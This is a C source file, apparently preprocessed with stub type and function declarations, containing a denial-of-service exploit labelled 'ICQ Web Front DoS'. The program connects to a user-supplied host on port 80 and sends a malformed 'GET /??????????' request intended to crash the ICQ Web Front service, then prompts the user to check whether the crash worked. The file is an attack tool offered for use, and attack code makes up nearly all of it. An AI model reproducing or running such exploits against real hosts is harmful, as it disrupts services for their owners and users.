
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct sockaddr_in {int sin_port; int sin_family; int sin_addr; } ;
struct sockaddr {int dummy; } ;
struct in_addr {int dummy; } ;
struct hostent {int h_length; int h_addr; } ;
typedef int sin ;


 int AF_INET ;
 int SOCK_STREAM ;
 int bcopy (int ,char*,int ) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int ) ;
 struct hostent* gethostbyname (char*) ;
 int herror (char*) ;
 int htons (int) ;
 unsigned long inet_addr (char*) ;
 unsigned long ntohl (unsigned long) ;
 int perror (char*) ;
 int printf (char*,...) ;
 int send (int,char*,int ,int ) ;
 int socket (int ,int ,int ) ;
 int strlen (char*) ;

void main(int argc, char *argv[])
{
  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;


  char xploitstr1[50]="GET /?????????? HTTP/1.0 \n\n";


  printf("ICQ Web Front DoS - author: char0hlz/tPG\n");
  printf("The Poor Gurus' Network [http://www.tpgn.net]\n");

  if (argc<2)
  {
    printf("usage: %s <hostname>\n", argv[0]);
    exit(0);
  }
  if ((he=gethostbyname(argv[1])) == ((void*)0))
  {
    herror("gethostbyname");
    exit(0);
  }
    start=inet_addr(argv[1]);
    counter=ntohl(start);
    sock=socket(AF_INET,SOCK_STREAM,0);
    bcopy(he->h_addr,(char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock,(struct sockaddr*)&sin,sizeof(sin))!=0)
    {
      perror("pr0blemz");
    }
    send(sock,xploitstr1,strlen(xploitstr1),0);
    close(sock);

   printf("Done. Refresh the page to see if it worked.\n");
}
